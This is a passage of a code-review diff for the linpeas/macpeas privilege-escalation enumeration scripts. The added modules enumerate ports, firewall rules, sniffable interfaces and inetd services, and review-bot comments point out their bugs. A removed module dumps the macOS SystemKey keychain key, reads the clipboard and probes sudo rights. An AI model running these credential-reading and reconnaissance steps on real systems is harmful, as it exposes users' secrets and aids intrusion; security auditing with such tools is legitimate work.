if [ -f "/proc/net/unix" ]; then
echo "Unix Domain Sockets:"
# Use awk to process the file in one go, avoiding duplicates and empty paths
awk '$8 != "" && $8 != "@" && $8 != "00000000" {
inode=$7
socket=$8
# Find process using inode
cmd="find /proc/[0-9]*/fd -ls 2>/dev/null | grep " inode " | head -n1 | awk \"{print \\$11}\" | xargs -r readlink"
pid=""
while (cmd | getline pid_dir) {
if (pid_dir != "") {
split(pid_dir, parts, "/")
pid=parts[3]
break
}
}
close(cmd)
if (pid != "") {
cmd="tr \\0 \" \" < /proc/" pid "/cmdline 2>/dev/null | cut -d\" \" -f1 | xargs -r basename"
cmd | getline prog
close(cmd)
if (prog != "") {
print " " socket " (" pid "/" prog ")"
} else {
print " " socket " (" pid ")"
}
} else {
print " " socket
}
}' /proc/net/unix 2>/dev/null | sort -u
fi
# Check for ports in use by systemd
if command -v systemctl >/dev/null 2>&1; then
echo -e "\nSystemd Socket Units:"
systemctl list-sockets 2>/dev/null | while IFS= read -r line; do
[ -z "$line" ] && continue
if ! echo "$line" | grep -q "UNIT\|listed"; then
echo " $line"
fi
done
fi
fi
echo ""
}
get_open_ports
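Review bot: `parse_proc_net_ports` misreads `/proc/net/tcp`: after the `sl` column the data fields are `local_address rem_address st tx_queue:rx_queue tr:tm->when retrnsmt uid timeout inode`, so `$5` is the combined `tx_queue:rx_queue` pair (not tx_queue), `$6` is `tr:tm->when` (not rx_queue) and the uid is `$8`, not `$7`; only `$10` for the inode is right. The UDP call is also a no-op: bound UDP sockets carry state `07` in `/proc/net/udp`, so the `[ "$state" = "LISTEN" ]` filter drops every one of them; treat `07` as listening for udp, and consider `/proc/net/tcp6`/`udp6` as well. In `get_process_info`, `grep -q "$inode"` on `ls -l` output is a substring match (inode 1234 also matches 51234); match on `socket:\[$inode\]`. Finally, on macOS `netstat -punta` is not a valid invocation, and the `netstat -anv` fallback from the removed file is gone, so the macOS path ends up in the `/proc/net` branch with nothing to parse.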

View File

@ -0,0 +1,88 @@
# Title: Network Information - MacOS network capabilities
# ID: NT_Macos_network_capabilities
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: MacOS network Capabilities
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_3title, warn_exec
# Global Variables: $MACPEAS, $EXTRA_CHECKS
# Initial Functions:
# Generated Global Variables: $net_service
# Fat linpeas: 0
# Small linpeas: 0
# Function to get network capabilities information
get_macos_network_capabilities() {
print_2title "Network Capabilities"
# Basic network information
echo ""
print_3title "Network Interfaces and Configuration"
warn_exec system_profiler SPNetworkDataType
# Network locations
echo ""
print_3title "Network Locations"
warn_exec system_profiler SPNetworkLocationDataType
# Network extensions
echo ""
print_3title "Network Extensions"
if [ -d "/Library/SystemExtensions" ]; then
warn_exec systemextensionsctl list
fi
# Network security
echo ""
print_3title "Network Security"
if command -v networksetup >/dev/null 2>&1; then
echo "Firewall Status:"
warn_exec networksetup -getglobalstate
echo -e "\nFirewall Rules:"
warn_exec networksetup -listallnetworkservices | while read -r net_service; do
if [ -n "$net_service" ]; then
echo "Service: $net_service"
warn_exec networksetup -getwebproxy "$net_service"
warn_exec networksetup -getsecurewebproxy "$net_service"
warn_exec networksetup -getproxybypassdomains "$net_service"
fi
done
fi
# Additional network information if EXTRA_CHECKS is enabled
if [ "$EXTRA_CHECKS" ]; then
# Network preferences
echo ""
print_3title "Network Preferences"
if [ -f "/Library/Preferences/SystemConfiguration/preferences.plist" ]; then
warn_exec plutil -p /Library/Preferences/SystemConfiguration/preferences.plist | grep -A 5 "NetworkServices"
fi
# Network statistics
echo ""
print_3title "Network Statistics"
warn_exec netstat -s
# Network routes
echo ""
print_3title "Network Routes"
warn_exec netstat -rn
# Network interfaces details
echo ""
print_3title "Network Interfaces Details"
warn_exec ifconfig -a
# Network kernel extensions
echo ""
print_3title "Network Kernel Extensions"
warn_exec kextstat | grep -i network
fi
echo ""
}
if [ "$MACPEAS" ]; then
get_macos_network_capabilities
fi
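Review bot: `networksetup -getglobalstate` is not a `networksetup` subcommand, so the "Firewall Status:" line will only ever show an error; the application firewall state is read with `/usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate`, the same binary the network-services module already calls with `--listapps`. The "Firewall Rules:" label above the `-listallnetworkservices` loop is also misleading, since what follows is per-service proxy configuration, and the first line of that command's output ("An asterisk (*) denotes that a network service is disabled.") will be passed to `networksetup -getwebproxy` as a service name; skip it with `tail -n +2`.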

View File

@ -0,0 +1,164 @@
# Title: Network Information - MacOS Network Services
# ID: NT_Macos_network_services
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Enumerate macos network services
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_3title, warn_exec
# Global Variables: $EXTRA_CHECKS, $MACPEAS, $E, $SED_RED
# Initial Functions:
# Generated Global Variables: $sharing_service, $profile, $port3, $service_count, $port1, $port, $services, $total, $port_list, $count, $ports, $active_ports, $port2
# Fat linpeas: 0
# Small linpeas: 0
# Function to check if a port is listening
check_listening_port() {
local port=$1
local service=$2
local count=0
# Check both IPv4 and IPv6
count=$(netstat -na 2>/dev/null | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.${port}" | wc -l)
echo "$count"
}
# Function to get sharing services status
get_sharing_services_status() {
print_2title "MacOS Sharing Services Status"
# Define services and their ports using parallel arrays
services="Screen Sharing File Sharing Remote Login Remote Management Remote Apple Events Back to My Mac AirPlay Receiver AirDrop Bonjour Printer Sharing Internet Sharing"
ports="5900 88,445,548 22 3283 3031 4488 7000 5353 5353 515,631 67,68"
# Check each service
echo "Service Status (0=OFF, >0=ON):"
echo "--------------------------------"
# Get number of services
service_count=$(echo "$services" | wc -w)
# Loop through services using index
i=1
while [ $i -le $service_count ]; do
sharing_service=$(echo "$services" | cut -d' ' -f$i)
port_list=$(echo "$ports" | cut -d' ' -f$i)
total=0
active_ports=""
# Check each port for the service
port1=$(echo "$port_list" | cut -d',' -f1)
port2=$(echo "$port_list" | cut -d',' -f2)
port3=$(echo "$port_list" | cut -d',' -f3)
for port in $port1 $port2 $port3; do
if [ -n "$port" ]; then
count=$(check_listening_port "$port" "$sharing_service")
if [ "$count" -gt 0 ]; then
total=$((total + count))
if [ -n "$active_ports" ]; then
active_ports="${active_ports},"
fi
active_ports="${active_ports}${port}"
fi
fi
done
# Print service status
if [ "$total" -gt 0 ]; then
printf "%-20s: ON (Ports: %s)\n" "$sharing_service" "$active_ports" | sed -${E} "s,ON.*,${SED_RED},g"
else
printf "%-20s: OFF\n" "$sharing_service"
fi
i=$((i + 1))
done
echo ""
}
# Function to get VPN information
get_vpn_info() {
print_3title "VPN Information"
# Get VPN configurations
warn_exec system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED},g"
# Check for VPN profiles
if [ -d "/Library/Preferences/SystemConfiguration" ]; then
echo -e "\nVPN Profiles:"
find /Library/Preferences/SystemConfiguration -name "*.plist" -exec grep -l "VPN" {} \; 2>/dev/null | while read -r profile; do
echo "Profile: $profile"
warn_exec plutil -p "$profile" | grep -A 5 "VPN"
done
fi
echo ""
}
# Function to get firewall information
get_firewall_info() {
print_3title "Firewall Information"
# Get firewall status
warn_exec system_profiler SPFirewallDataType
# Get application firewall rules
if command -v /usr/libexec/ApplicationFirewall/socketfilterfw >/dev/null 2>&1; then
echo -e "\nApplication Firewall Rules:"
warn_exec /usr/libexec/ApplicationFirewall/socketfilterfw --listapps
fi
# Get pf firewall rules if available
if command -v pfctl >/dev/null 2>&1; then
echo -e "\nPF Firewall Rules:"
warn_exec pfctl -s rules 2>/dev/null
fi
echo ""
}
# Function to get additional network information
get_additional_network_info() {
if [ "$EXTRA_CHECKS" ]; then
print_3title "Additional Network Information"
# Bluetooth information
echo "Bluetooth Status:"
warn_exec system_profiler SPBluetoothDataType
# Ethernet information
echo -e "\nEthernet Status:"
warn_exec system_profiler SPEthernetDataType
# USB network adapters
echo -e "\nUSB Network Adapters:"
warn_exec system_profiler SPUSBDataType
# Network kernel extensions
echo -e "\nNetwork Kernel Extensions:"
warn_exec kextstat | grep -i "network\|ethernet\|wifi\|bluetooth"
# Network daemons
echo -e "\nNetwork Daemons:"
warn_exec launchctl list | grep -i "network\|vpn\|firewall\|sharing"
fi
echo ""
}
# Main function to get all network services information
get_macos_network_services() {
if [ "$MACPEAS" ]; then
# Get sharing services status
get_sharing_services_status
# Get VPN information
get_vpn_info
# Get firewall information
get_firewall_info
# Get additional network information if EXTRA_CHECKS is enabled
get_additional_network_info
fi
}
if [ "$MACPEAS" ]; then
get_macos_network_services
fi
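Review bot: the parallel "arrays" in `get_sharing_services_status` break on the multi-word service names: `cut -d' ' -f$i` over `services="Screen Sharing File Sharing Remote Login ..."` yields "Screen", "Sharing", "File", ... and `wc -w` counts 22 entries against 11 port groups, so every row is mislabelled and rows 12 to 22 get an empty `port_list`. Use a delimiter that cannot appear in a name (for example `|` with `cut -d'|'`, or one service per line with `sed -n "${i}p"`). A second issue: for single-port entries `cut -d',' -f2` and `-f3` return the whole field again (cut passes lines without the delimiter through unless `-s` is given), so `5900` is checked three times and reported as "Ports: 5900,5900,5900"; add `-s` or split with `tr ',' ' '`. The `$service` argument to `check_listening_port` is unused, and `i` is missing from the header's `Generated Global Variables:`.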

View File

@ -0,0 +1,168 @@
# Title: Network Information - Network Traffic Analysis
# ID: NT_Tcpdump
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Check network traffic analysis capabilities and tools
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_3title, print_info, warn_exec
# Global Variables: $EXTRA_CHECKS, $E, $SED_RED, $SED_GREEN
# Initial Functions:
# Generated Global Variables: $tools_found, $tool, $interfaces, $interfaces_found, $iface, $cmd, $pattern, $patterns
# Fat linpeas: 0
# Small linpeas: 1
# Function to check if a command exists and is executable
check_command() {
local cmd=$1
if command -v "$cmd" >/dev/null 2>&1; then
if [ -x "$(command -v "$cmd")" ]; then
return 0
fi
fi
return 1
}
# Function to check if we can sniff on an interface
check_interface_sniffable() {
local iface=$1
if timeout 1 tcpdump -i "$iface" -c 1 >/dev/null 2>&1; then
return 0
fi
return 1
}
# Function to check for promiscuous mode
check_promiscuous_mode() {
local iface=$1
if ip link show "$iface" 2>/dev/null | grep -q "PROMISC"; then
return 0
fi
return 1
}
# Main function to check network traffic analysis capabilities
check_network_traffic_analysis() {
print_2title "Network Traffic Analysis Capabilities"
# Check for sniffing tools
echo ""
print_3title "Available Sniffing Tools"
tools_found=0
if check_command tcpdump; then
echo "tcpdump is available" | sed -${E} "s,.*,${SED_GREEN},g"
tools_found=1
# Check tcpdump version and capabilities
warn_exec tcpdump --version 2>/dev/null | head -n 1
fi
if check_command tshark; then
echo "tshark is available" | sed -${E} "s,.*,${SED_GREEN},g"
tools_found=1
# Check tshark version
warn_exec tshark --version 2>/dev/null | head -n 1
fi
if check_command wireshark; then
echo "wireshark is available" | sed -${E} "s,.*,${SED_GREEN},g"
tools_found=1
fi
if [ $tools_found -eq 0 ]; then
echo "No sniffing tools found" | sed -${E} "s,.*,${SED_RED},g"
fi
# Check network interfaces
echo ""
print_3title "Network Interfaces Sniffing Capabilities"
interfaces_found=0
# Get list of network interfaces
if command -v ip >/dev/null 2>&1; then
interfaces=$(ip -o link show | awk -F': ' '{print $2}')
elif command -v ifconfig >/dev/null 2>&1; then
interfaces=$(ifconfig -a | grep -o '^[^ ]*:' | tr -d ':')
else
interfaces=$(ls /sys/class/net/ 2>/dev/null)
fi
for iface in $interfaces; do
if [ "$iface" != "lo" ]; then # Skip loopback
echo -n "Interface $iface: "
if check_interface_sniffable "$iface"; then
echo "Sniffable" | sed -${E} "s,.*,${SED_GREEN},g"
interfaces_found=1
# Check promiscuous mode
if check_promiscuous_mode "$iface"; then
echo " - Promiscuous mode enabled" | sed -${E} "s,.*,${SED_RED},g"
fi
# Get interface details
if [ "$EXTRA_CHECKS" ]; then
echo " - Interface details:"
warn_exec ip addr show "$iface" 2>/dev/null || ifconfig "$iface" 2>/dev/null
fi
else
echo "Not sniffable" | sed -${E} "s,.*,${SED_RED},g"
fi
fi
done
if [ $interfaces_found -eq 0 ]; then
echo "No sniffable interfaces found" | sed -${E} "s,.*,${SED_RED},g"
fi
# Check for sensitive traffic patterns if we have sniffing capabilities
if [ $tools_found -eq 1 ] && [ $interfaces_found -eq 1 ]; then
echo ""
print_3title "Sensitive Traffic Detection"
print_info "Checking for common sensitive traffic patterns..."
# List of sensitive traffic patterns to check
patterns="
- HTTP Basic Auth
- FTP credentials
- SMTP credentials
- MySQL/MariaDB traffic
- PostgreSQL traffic
- Redis traffic
- MongoDB traffic
- LDAP traffic
- SMB traffic
- DNS queries
- SNMP traffic
- Many more...
"
echo "$patterns" | while read -r pattern; do
if [ -n "$pattern" ]; then
echo "$pattern"
fi
done
print_info "To capture sensitive traffic, you can use:"
echo "tcpdump -i <interface> -w capture.pcap" | sed -${E} "s,.*,${SED_GREEN},g"
echo "tshark -i <interface> -w capture.pcap" | sed -${E} "s,.*,${SED_GREEN},g"
fi
# Additional information
if [ "$EXTRA_CHECKS" ]; then
echo ""
print_3title "Additional Network Analysis Information"
# Check for network monitoring tools
echo "Checking for network monitoring tools..."
for tool in nethogs iftop iotop nload bmon; do
if check_command "$tool"; then
echo "$tool is available" | sed -${E} "s,.*,${SED_GREEN},g"
fi
done
fi
echo ""
}
# Run the main function
check_network_traffic_analysis
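Review bot: the "Sensitive Traffic Detection" block (from `print_3title "Sensitive Traffic Detection"` through the `patterns` loop) performs no detection at all; it prints a static list under a message that claims `Checking for common sensitive traffic patterns...`. Either rename the title and message to say it is a reminder of what a capture may expose, or drop the block. Three smaller points: `interfaces=$(ip -o link show | awk -F': ' '{print $2}')` keeps the `@peer` suffix that `ip` prints for veth/VLAN interfaces (e.g. `eth0@if12` inside containers), so the later `ip addr show "$iface"` fails for them; strip it with `cut -d@ -f1`. `echo -n "Interface $iface: "` (and the `echo -e` used in the sibling modules) is not portable if the script runs under /bin/sh, where dash prints the flag literally; use `printf`. And some tcpdump releases write `--version` to stderr, so `warn_exec tcpdump --version 2>/dev/null | head -n 1` may print nothing; use `2>&1` instead.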

View File

@ -0,0 +1,210 @@
# Title: Network Information - Firewall Rules Analysis
# ID: NT_Iptables
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Analyze firewall rules and configurations
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_3title, warn_exec, echo_not_found
# Global Variables: $EXTRA_CHECKS, $E, $SED_RED, $SED_GREEN, $SED_YELLOW
# Initial Functions:
# Generated Global Variables: $rules_file, $cmd, $tool, $config_file
# Fat linpeas: 0
# Small linpeas: 1
# Function to check if a command exists and is executable
check_command() {
local cmd=$1
if command -v "$cmd" >/dev/null 2>&1; then
if [ -x "$(command -v "$cmd")" ]; then
return 0
fi
fi
return 1
}
# Function to analyze iptables rules
analyze_iptables() {
echo ""
print_3title "Iptables Rules"
# Check if iptables is available
if ! check_command iptables; then
echo_not_found "iptables"
return
fi
# Check if we have permission to list rules
if ! timeout 1 iptables -L >/dev/null 2>&1; then
echo "No permission to list iptables rules" | sed -${E} "s,.*,${SED_RED},g"
return
fi
# Get iptables version
warn_exec iptables --version 2>/dev/null
# List all chains and rules
echo -e "\nFilter Table Rules:"
warn_exec iptables -L -v -n 2>/dev/null
echo -e "\nNAT Table Rules:"
warn_exec iptables -t nat -L -v -n 2>/dev/null
echo -e "\nMangle Table Rules:"
warn_exec iptables -t mangle -L -v -n 2>/dev/null
# Check for custom chains
echo -e "\nCustom Chains:"
warn_exec iptables -L -v -n | grep -E "^Chain [A-Za-z]" | grep -v "INPUT\|OUTPUT\|FORWARD\|PREROUTING\|POSTROUTING" 2>/dev/null
# Check for saved rules
echo -e "\nSaved Rules:"
for rules_file in /etc/iptables/* /etc/iptables/rules.v4 /etc/iptables/rules.v6 /etc/iptables-save /etc/iptables.save; do
if [ -f "$rules_file" ]; then
echo "Found rules in $rules_file:"
warn_exec cat "$rules_file" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null
fi
done
}
# Function to analyze nftables rules
analyze_nftables() {
echo ""
print_3title "Nftables Rules"
# Check if nft is available
if ! check_command nft; then
echo_not_found "nftables"
return
fi
# Check if we have permission to list rules
if ! timeout 1 nft list ruleset >/dev/null 2>&1; then
echo "No permission to list nftables rules" | sed -${E} "s,.*,${SED_RED},g"
return
fi
# Get nftables version
warn_exec nft --version 2>/dev/null
# List all rules
echo -e "\nNftables Ruleset:"
warn_exec nft list ruleset 2>/dev/null
# Check for saved rules
echo -e "\nSaved Rules:"
for rules_file in /etc/nftables.conf /etc/sysconfig/nftables.conf; do
if [ -f "$rules_file" ]; then
echo "Found rules in $rules_file:"
warn_exec cat "$rules_file" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null
fi
done
}
# Function to analyze firewalld rules
analyze_firewalld() {
echo ""
print_3title "Firewalld Rules"
# Check if firewall-cmd is available
if ! check_command firewall-cmd; then
echo_not_found "firewalld"
return
fi
# Check if firewalld is running
if ! systemctl is-active firewalld >/dev/null 2>&1; then
echo "Firewalld is not running" | sed -${E} "s,.*,${SED_YELLOW},g"
return
fi
# Get firewalld version
warn_exec firewall-cmd --version 2>/dev/null
# List all zones
echo -e "\nFirewalld Zones:"
warn_exec firewall-cmd --list-all-zones 2>/dev/null
# List active zones
echo -e "\nActive Zones:"
warn_exec firewall-cmd --get-active-zones 2>/dev/null
# List services
echo -e "\nAvailable Services:"
warn_exec firewall-cmd --list-services 2>/dev/null
# List ports
echo -e "\nOpen Ports:"
warn_exec firewall-cmd --list-ports 2>/dev/null
# List rich rules
echo -e "\nRich Rules:"
warn_exec firewall-cmd --list-rich-rules 2>/dev/null
}
# Function to analyze UFW rules
analyze_ufw() {
echo ""
print_3title "UFW Rules"
# Check if ufw is available
if ! check_command ufw; then
echo_not_found "ufw"
return
fi
# Check if UFW is running
if ! ufw status >/dev/null 2>&1; then
echo "UFW is not running" | sed -${E} "s,.*,${SED_YELLOW},g"
return
fi
# Get UFW version
warn_exec ufw version 2>/dev/null
# List rules
echo -e "\nUFW Rules:"
warn_exec ufw status verbose 2>/dev/null
# List numbered rules
echo -e "\nNumbered Rules:"
warn_exec ufw status numbered 2>/dev/null
}
# Main function to analyze firewall rules
analyze_firewall_rules() {
print_2title "Firewall Rules Analysis"
# Analyze different firewall systems
analyze_iptables
analyze_nftables
analyze_firewalld
analyze_ufw
# Additional checks if EXTRA_CHECKS is enabled
if [ "$EXTRA_CHECKS" ]; then
echo ""
print_3title "Additional Firewall Information"
# Check for common firewall configuration files
echo "Checking for firewall configuration files..."
for config_file in /etc/sysconfig/iptables /etc/sysconfig/ip6tables /etc/iptables/rules.v4 /etc/iptables/rules.v6 /etc/nftables.conf /etc/ufw/user.rules /etc/ufw/user6.rules; do
if [ -f "$config_file" ]; then
echo "Found configuration file: $config_file" | sed -${E} "s,.*,${SED_GREEN},g"
fi
done
# Check for firewall management tools
echo -e "\nChecking for firewall management tools..."
for tool in shorewall shorewall6 ferm; do
if check_command "$tool"; then
echo "$tool is available" | sed -${E} "s,.*,${SED_GREEN},g"
fi
done
fi
echo ""
}
# Run the main function
analyze_firewall_rules
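Review bot: the permission probe `if ! timeout 1 iptables -L >/dev/null 2>&1; then` omits `-n`, so iptables attempts reverse DNS on every address in the rule set; on a host with rules and a slow resolver the one-second timeout expires and the module reports "No permission to list iptables rules" even though the later `iptables -L -v -n` calls would succeed. Use `timeout 1 iptables -L -n`. Two further points in the same hunk: the saved-rules loop `for rules_file in /etc/iptables/* /etc/iptables/rules.v4 /etc/iptables/rules.v6 ...` prints rules.v4 and rules.v6 twice because the glob already matches them; and `if ! ufw status >/dev/null 2>&1; then` also fails for a non-root user (ufw refuses to run), so "UFW is not running" is misleading in that case; word it as "not running or not readable", or check `id -u` first.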

View File

@ -0,0 +1,192 @@
# Title: Network Information - Inetd/Xinetd Services Analysis
# ID: NT_Inetdconf
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Analyze inetd and xinetd services and configurations
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_3title, warn_exec, echo_not_found
# Global Variables: $EXTRA_CHECKS, $E, $SED_RED, $SED_GREEN, $SED_YELLOW
# Initial Functions:
# Generated Global Variables: $inetd_service, $log_file, $cmd, $service_name, $conf_file, $service_dir, $service_file, $inetd_file
# Fat linpeas: 0
# Small linpeas: 0
# Function to check if a command exists and is executable
check_command() {
local cmd=$1
if command -v "$cmd" >/dev/null 2>&1; then
if [ -x "$(command -v "$cmd")" ]; then
return 0
fi
fi
return 1
}
# Function to analyze inetd services
analyze_inetd() {
echo ""
print_3title "Inetd Services"
# Check if inetd is installed
if ! check_command inetd; then
echo_not_found "inetd"
return
fi
# Check if inetd is running
if ! pgrep -x inetd >/dev/null 2>&1; then
echo "inetd is not running" | sed -${E} "s,.*,${SED_YELLOW},g"
fi
# Get inetd version
warn_exec inetd -v 2>/dev/null
# Check main configuration file
if [ -f "/etc/inetd.conf" ]; then
echo -e "\nInetd Configuration (/etc/inetd.conf):"
warn_exec cat /etc/inetd.conf | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
# Check for potentially dangerous services
echo -e "\nPotentially Dangerous Services:"
warn_exec cat /etc/inetd.conf | grep -v "^$" | grep -Ev "\W+\#|^#" | grep -iE "shell|login|exec|rsh|rlogin|rexec|finger|telnet|ftp|tftp" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
else
echo_not_found "/etc/inetd.conf"
fi
# Check for additional configuration files
echo -e "\nAdditional Inetd Configuration Files:"
for conf_file in /etc/inetd.d/* /etc/inet/*.conf; do
if [ -f "$conf_file" ]; then
echo "Found configuration in $conf_file:"
warn_exec cat "$conf_file" | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
fi
done
}
# Function to analyze xinetd services
analyze_xinetd() {
echo ""
print_3title "Xinetd Services"
# Check if xinetd is installed
if ! check_command xinetd; then
echo_not_found "xinetd"
return
fi
# Check if xinetd is running
if ! pgrep -x xinetd >/dev/null 2>&1; then
echo "xinetd is not running" | sed -${E} "s,.*,${SED_YELLOW},g"
fi
# Get xinetd version
warn_exec xinetd -version 2>/dev/null
# Check main configuration file
if [ -f "/etc/xinetd.conf" ]; then
echo -e "\nXinetd Configuration (/etc/xinetd.conf):"
warn_exec cat /etc/xinetd.conf | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
# Check for included configurations
echo -e "\nIncluded Configurations:"
warn_exec grep -r "includedir" /etc/xinetd.conf 2>/dev/null
else
echo_not_found "/etc/xinetd.conf"
fi
# Check for service-specific configurations
echo -e "\nService Configurations:"
for service_dir in /etc/xinetd.d/ /etc/xinetd/; do
if [ -d "$service_dir" ]; then
echo "Services in $service_dir:"
for service_file in "$service_dir"/*; do
if [ -f "$service_file" ]; then
service_name=$(basename "$service_file")
echo -e "\nService: $service_name"
# Check if service is enabled
if grep -q "disable.*=.*no" "$service_file" 2>/dev/null; then
echo "Status: Enabled" | sed -${E} "s,.*,${SED_RED},g"
else
echo "Status: Disabled"
fi
# Show service configuration
warn_exec cat "$service_file" | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
# Check for potentially dangerous configurations
if grep -qiE "server.*=.*/bin/|server.*=.*/sbin/|server.*=.*/usr/bin/|server.*=.*/usr/sbin/" "$service_file" 2>/dev/null; then
echo "Warning: Service uses system binaries" | sed -${E} "s,.*,${SED_RED},g"
fi
if grep -qiE "user.*=.*root|user.*=.*0" "$service_file" 2>/dev/null; then
echo "Warning: Service runs as root" | sed -${E} "s,.*,${SED_RED},g"
fi
fi
done
fi
done
}
# Function to check for running inetd/xinetd services
check_running_services() {
echo ""
print_3title "Running Inetd/Xinetd Services"
# Check netstat for services
if check_command netstat; then
echo "Active Services (from netstat):"
warn_exec netstat -tulpn 2>/dev/null | grep -E "inetd|xinetd" | sed -${E} "s,.*,${SED_RED},g"
fi
# Check ss for services
if check_command ss; then
echo -e "\nActive Services (from ss):"
warn_exec ss -tulpn 2>/dev/null | grep -E "inetd|xinetd" | sed -${E} "s,.*,${SED_RED},g"
fi
# Check for service processes
echo -e "\nRunning Service Processes:"
for inetd_service in $(pgrep -l inetd 2>/dev/null; pgrep -l xinetd 2>/dev/null); do
echo "$inetd_service" | sed -${E} "s,.*,${SED_RED},g"
done
}
# Main function to analyze inetd/xinetd services
analyze_inetd_services() {
print_2title "Inetd/Xinetd Services Analysis"
# Analyze inetd and xinetd services
analyze_inetd
analyze_xinetd
# Check for running services
check_running_services
# Additional checks if EXTRA_CHECKS is enabled
if [ "$EXTRA_CHECKS" ]; then
echo ""
print_3title "Additional Inetd/Xinetd Information"
# Check for inetd/xinetd logs
echo "Checking for service logs..."
for log_file in /var/log/inetd.log /var/log/xinetd.log /var/log/messages /var/log/syslog; do
if [ -f "$log_file" ]; then
echo "Found log file: $log_file" | sed -${E} "s,.*,${SED_GREEN},g"
warn_exec tail -n 20 "$log_file" | grep -iE "inetd|xinetd" 2>/dev/null
fi
done
# Check for inetd/xinetd related files
echo -e "\nChecking for related files..."
for file in /etc/init.d/inetd /etc/init.d/xinetd /etc/default/inetd /etc/default/xinetd; do
if [ -f "$inetd_file" ]; then
echo "Found file: $inetd_file" | sed -${E} "s,.*,${SED_GREEN},g"
warn_exec cat "$inetd_file" | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
fi
done
fi
echo ""
}
# Run the main function
analyze_inetd_services
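Review bot: the related-files loop in the EXTRA_CHECKS block can never match anything: it iterates with `for file in /etc/init.d/inetd /etc/init.d/xinetd /etc/default/inetd /etc/default/xinetd; do` but tests and prints `$inetd_file` (`if [ -f "$inetd_file" ]; then`), which is never assigned in this function. Rename the loop variable to `inetd_file`, which is also the name declared in the `Generated Global Variables` header. Minor: `for inetd_service in $(pgrep -l inetd 2>/dev/null; pgrep -l xinetd 2>/dev/null); do` word-splits each `pid name` pair into two iterations, so pids and names come out on separate lines; pipe `pgrep -l` into `while read -r pid name` instead.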

View File

@ -1,232 +0,0 @@
###########################################
#----------) Users Information (----------#
###########################################
#-- UI) My user
print_2title "My user"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users"
(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
echo ""
if [ "$MACPEAS" ];then
print_2title "Current user Login and Logout hooks"
defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
echo ""
print_2title "All Login and Logout hooks"
defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist
echo ""
print_2title "Keychains"
print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker"
security list-keychains
echo ""
print_2title "SystemKey"
ls -l /var/db/SystemKey
if [ -r "/var/db/SystemKey" ]; then
echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},";
hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},";
fi
echo ""
fi
#-- UI) PGP keys?
print_2title "Do I have PGP keys?"
command -v gpg 2>/dev/null || echo_not_found "gpg"
gpg --list-keys 2>/dev/null
command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys"
netpgpkeys --list-keys 2>/dev/null
command -v netpgp 2>/dev/null || echo_not_found "netpgp"
echo ""
#-- UI) Clipboard and highlighted text
if [ "$(command -v xclip 2>/dev/null)" ] || [ "$(command -v xsel 2>/dev/null)" ] || [ "$(command -v pbpaste 2>/dev/null)" ] || [ "$DEBUG" ]; then
print_2title "Clipboard or highlighted text?"
if [ "$(command -v xclip 2>/dev/null)" ]; then
echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
elif [ "$(command -v xsel 2>/dev/null)" ]; then
echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
elif [ "$(command -v pbpaste 2>/dev/null)" ]; then
echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
else echo_not_found "xsel and xclip"
fi
echo ""
fi
#-- UI) Sudo -l
print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid"
(echo '' | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo"
if [ "$PASSWORD" ]; then
